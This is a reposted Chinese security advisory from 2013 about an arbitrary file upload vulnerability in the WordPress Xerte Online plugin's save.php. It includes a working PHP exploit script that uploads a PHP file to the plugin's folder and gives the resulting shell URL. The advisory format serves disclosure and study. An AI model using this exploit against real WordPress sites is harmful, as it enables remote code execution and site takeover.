欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

WordPress Xerte Online插件'save.php'任意文件上传漏洞

来源:本站转载 作者:佚名 时间:2013-01-04 TAG: 我要投稿

 受影响系统:

WordPress Xerte Online 0.32
描述:
BUGTRAQ  ID: 57098
 
Xerte Online for WordPress是基于服务器的内容作者的工具集。
 
Xerte Online for WordPress内存在安全漏洞,wp-content/plugins/xerte-online/xertefiles/save.php允许上传带有任意扩展名的文件到webroot内的文件夹,通过提交恶意的PHP脚本,可导致任意PHP代码执行。
 
<*来源:Sammy Forgit
  
  链接:http://www.securelist.com/en/advisories/51691
        http://packetstormsecurity.com/files/119220/wpxerteonline-shell.txt
*>
 
测试方法:
警 告
 
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
 
Exploit :
 
PostShell.php
<?php
 
$code = "<? phpinfo(); ?>"; 
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php",
        'filedata'=>"$code"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>
 
 
Shell Access :
http://localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php
 
 
# Site : 1337day.com Inj3ct0r Exploit Database
 
建议:
厂商补丁:
 
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://wordpress.org/extend/plugins/xerte-online/
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载